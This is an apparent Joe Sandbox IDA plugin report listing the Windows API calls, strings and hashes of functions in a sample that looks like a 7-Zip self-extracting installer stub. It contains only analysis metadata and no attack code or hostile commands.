                                                                  • API String ID: 613200358-3743982587
                                                                  • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                  • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                                                  • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                                                  • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                                                  • API String ID: 613200358-994561823
                                                                  • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                  • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                                                  • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                                                  • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                                                  APIs
                                                                  • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                                                  • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                                                  • GetDC.USER32(00000000), ref: 00406DFB
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                                                  • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                                                  • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                                                  • String ID:
                                                                  • API String ID: 2693764856-0
                                                                  • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                  • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                                                  • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                                                  • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 0040696E
                                                                  • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                                                  • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                                                  • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                                                  • SelectObject.GDI32(?,?), ref: 004069B8
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                                                  • SelectObject.GDI32(?,?), ref: 004069F9
                                                                  • ReleaseDC.USER32(?,?), ref: 00406A08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                  • String ID:
                                                                  • API String ID: 2466489532-0
                                                                  • Opcode ID: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                  • Instruction ID: 7c755332e1b278278a0584394201b19561512224090c74d51841a9ad660c27ee
                                                                  • Opcode Fuzzy Hash: 3371c90df87af61a96ab0a4f5adfc31794890a389d4733c3cd0e84d47817aa4d
                                                                  • Instruction Fuzzy Hash: 6B216871900209EFCB119F65DD84A8EBFF4EF08321F10C46AE559A72A0C7359A50DF40
                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                  • GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                  • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                  • wsprintfW.USER32 ref: 00407BBB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@ItemMessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                  • String ID: %d%%
                                                                  • API String ID: 3753976982-1518462796
                                                                  • Opcode ID: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                  • Instruction ID: b955b8041d8a67620c3180d4911c799512bd6939d195f5b55c3092177650065a
                                                                  • Opcode Fuzzy Hash: 0b792d7adb6174ba2d50e5ca9cf87896ffea0db59519718aa7dbff65f529ef39
                                                                  • Instruction Fuzzy Hash: 1D31D371904208BBDB11AFA0CC45EDA7BB9EF48708F10847AFA42B61E1D779B904CB59
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(hAA,00000020,?,?,00405838,?,?,?,00000000,?), ref: 004040A4
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404156
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040415E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040416D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404175
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$CharUpper$lstrlen
                                                                  • String ID: hAA
                                                                  • API String ID: 2587799592-1362906312
                                                                  • Opcode ID: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                  • Instruction ID: 7f7e13310b21401de90169bcc26cd057e2afddf23eedd5de54135d69024cf91c
                                                                  • Opcode Fuzzy Hash: f1afb06a12cfea52e195ddd9e8ddb158cdff932f9735d488ba252034b153affa
                                                                  • Instruction Fuzzy Hash: D7212772D40215AACF20ABA4CC46AEB77B9DF90354F10407BEB41BB2E1E7789D848658
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000001,00000000,00000000,00000001,?,00000000), ref: 00404D3E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DA0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,004054CC,?,;!@InstallEnd@!,004054CC,;!@Install@!UTF-8!,00417400,00000000,00000001,?,00000000), ref: 00404DB8
                                                                    • Part of subcall function 00403354: lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                    • Part of subcall function 00403354: GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                    • Part of subcall function 00403354: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                    • Part of subcall function 00403354: ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                  • String ID: 03A$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                  • API String ID: 4038993085-2279431206
                                                                  • Opcode ID: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                  • Instruction ID: 637b7b13a9bcd1d52ea1019587bfa2fb4435f6835f564ae220b3123002230846
                                                                  • Opcode Fuzzy Hash: 1e5f1ef11ab3d9e84330ff60a8d60345b5fdf25d940142a54a900a3d947b53ea
                                                                  • Instruction Fuzzy Hash: CE312D71D0021EEACF05EF92CD429EEBBB4BF44318F10042BE911762E1DB785649DB98
                                                                  APIs
                                                                  • EndDialog.USER32(?,00000000), ref: 00407579
                                                                  • KillTimer.USER32(?,00000001), ref: 0040758A
                                                                  • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004075B4
                                                                  • SuspendThread.KERNEL32(0000027C), ref: 004075CD
                                                                  • ResumeThread.KERNEL32(0000027C), ref: 004075EA
                                                                  • EndDialog.USER32(?,00000000), ref: 0040760C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: DialogThreadTimer$KillResumeSuspend
                                                                  • String ID:
                                                                  • API String ID: 4151135813-0
                                                                  • Opcode ID: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                  • Instruction ID: ebb94c5c4675b2e6542c2b2cb7d5652cccd5624f9a00d71f737e39ca63bd9789
                                                                  • Opcode Fuzzy Hash: fa37b7d0569be928e5d0aecc9653dabfd5de706af621d680b5378aa8e85f3b57
                                                                  • Instruction Fuzzy Hash: 9811BF70A08618BBD7212F15EE849E77BBDFB00756B00843AF523A05A0CB39BD00DA1D
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                                                    • Part of subcall function 00404343: ??3@YAXPAX@Z.MSVCRT(?,?,?,004177C4,004177C4,?,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 004043B6
                                                                  • ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                  • wsprintfA.USER32 ref: 00404EBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$wsprintf
                                                                  • String ID: :Language:%u!$;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                  • API String ID: 2704270482-1550708412
                                                                  • Opcode ID: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                  • Instruction ID: afe26c372a183c0ca4a1b7edc16cb7be903c3e4040aad79e05e22cec791dc9d0
                                                                  • Opcode Fuzzy Hash: b3a647dc230e6375ba5304378dede3f86871d19815b7720c308d82744c7d9f3d
                                                                  • Instruction Fuzzy Hash: D8115E71B00018BBCF00FB95CC42EFE77ADAB84705B10402EBA15E3182DB78AB028799
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000,00000000), ref: 004038C6
                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405,?,00000000,00000000), ref: 00403904
                                                                  • ??3@YAXPAX@Z.MSVCRT(00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788,00407405), ref: 0040392A
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00417788,00417788,00000000,00417788,00417788,00000000,%%T/,004134FC,00000000,00417788,00000000,%%T\,0041350C,00000000,00417788), ref: 00403932
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: %%T/$%%T\
                                                                  • API String ID: 613200358-2679640699
                                                                  • Opcode ID: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                  • Instruction ID: 53c9ca64f2466311d4136dbbff57d229d1af9e29f5fa76e56e45344ae10c91f3
                                                                  • Opcode Fuzzy Hash: 9eec194740abc4bee078c15c8dc217b66edb47652cee4dab90ed516c3b80c8f9
                                                                  • Instruction Fuzzy Hash: 5011DD3190410EBACF05FFA1D857CEDBB79AE00708F50806AB511760E1EF79A785DB98
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403981
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 004039BF
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784,00407405), ref: 004039E5
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%S/,004134FC,00000000,00414784,00000000,%%S\,0041350C,00000000,00414784), ref: 004039ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: %%S/$%%S\
                                                                  • API String ID: 613200358-358529586
                                                                  • Opcode ID: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                  • Instruction ID: c240205f9e12946546b7747d8fd44f392230bc1153c6614d6b8016afa5fd7689
                                                                  • Opcode Fuzzy Hash: c94d4b60668bfb9eedf3143ce332dc4c41685f87d495a97f985edcc2faf71bca
                                                                  • Instruction Fuzzy Hash: 1D11AD3190410EBACF05FFA1D856CEDBB79AE00708F51806AB511760E1EF78A789DB98
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000,00000000), ref: 00403A3C
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405,?,00000000,00000000), ref: 00403A7A
                                                                  • ??3@YAXPAX@Z.MSVCRT(00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784,00407405), ref: 00403AA0
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00414784,00414784,00000000,00414784,00414784,00000000,%%M/,004134FC,00000000,00414784,00000000,%%M\,0041350C,00000000,00414784), ref: 00403AA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@
                                                                  • String ID: %%M/$%%M\
                                                                  • API String ID: 613200358-4143866494
                                                                  • Opcode ID: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                  • Instruction ID: 5f6947e2f47a7d655e02fb84317d9747a35bc7200d49f7273ebe403b31479b31
                                                                  • Opcode Fuzzy Hash: 3eb134fca1680c0093703720a533bafa1d2fd801437f3d80c27f205d784cf8f2
                                                                  • Instruction Fuzzy Hash: C911AD3190410EBACF05FFA1D956CEDBB79AE00708F51806AB511760E1EF78A789DB58
                                                                  APIs
                                                                  • _CxxThrowException.MSVCRT(00000000,00414CFC), ref: 0040E4EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID: $JA$4JA$DJA$TJA$hJA$xJA
                                                                  • API String ID: 432778473-803145960
                                                                  • Opcode ID: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                  • Instruction ID: 5492ea6659e041f1bcf420c4685f7038b08242b420f8f2c51a6428b2159ddc92
                                                                  • Opcode Fuzzy Hash: 8cab838d89dd1577677f775eaf8cb930bb6d64206a7fe5cceb0cff601651d84b
                                                                  • Instruction Fuzzy Hash: 7211A5F0541B419BC7308F16E544587FBF8AF907587218A1FD0AA9BA51D3F8A1888B9C
                                                                  APIs
                                                                    • Part of subcall function 0040BA46: ??2@YAPAXI@Z.MSVCRT(0000000C,?,0040C20C,004149B0,00000001,?,?,00000000), ref: 0040BA4B
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004149B0,00000001,?,?,00000000), ref: 0040C20D
                                                                    • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                    • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                    • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,004149B0,00000001,?,?,00000000), ref: 0040C245
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$??3@$memmove
                                                                  • String ID: IA$IA$IA
                                                                  • API String ID: 4294387087-924693538
                                                                  • Opcode ID: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                  • Instruction ID: 38d37476858cbe2739f158cf8086d9562841ccd83740beefedbf55b6536d6dac
                                                                  • Opcode Fuzzy Hash: 3ef1446a3f9eae3cfdc2853b922aca3bc2f9cc2cd28dfb990552d7283ffc15f1
                                                                  • Instruction Fuzzy Hash: 20B1C1B1900209DFCB54EFAAC8819DEBBB5BF48304F50852EF919A7291DB38A945CF54
                                                                  APIs
                                                                  • _CxxThrowException.MSVCRT(00100EC3,00414CFC), ref: 0040E83C
                                                                  • ??2@YAPAXI@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E864
                                                                  • memcpy.MSVCRT(00000000,?,?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?), ref: 0040E88D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,IA,IA,00000000,?,0040E909,00000000,00408769,IA,00402F92,00000000,00000000,004044E9,?,?,?), ref: 0040E898
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                  • String ID: IA
                                                                  • API String ID: 3462485524-3293647318
                                                                  • Opcode ID: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                  • Instruction ID: e9362666a157510f6fc1816af10740f0f0ab3f4ff6eb75305f8b2a096945a613
                                                                  • Opcode Fuzzy Hash: 6b78721643db57d5e00a8af36ebe01533f1ba9cf87e040577b2ff72779c9c95d
                                                                  • Instruction Fuzzy Hash: 6811E5736003009BCB28AF57D880D6BFBE9AB84354714C83FEA59A7290D779E8954794
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf$ExitProcesslstrcat
                                                                  • String ID: 0x%p
                                                                  • API String ID: 2530384128-1745605757
                                                                  • Opcode ID: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                  • Instruction ID: 6c9eba3c29ae2a0cc7ccd16f79f39b6d6218d418ab2b897ff95ca6c62132cda7
                                                                  • Opcode Fuzzy Hash: beb3389330693802dd4b40a551927b7f0c9c9e0999a7fc1e7fc7f64098bb755c
                                                                  • Instruction Fuzzy Hash: CF019E7580020CAFDB20AFA0DC45FDA777CBF44305F04486AF945A2081D738F6948FAA
                                                                  APIs
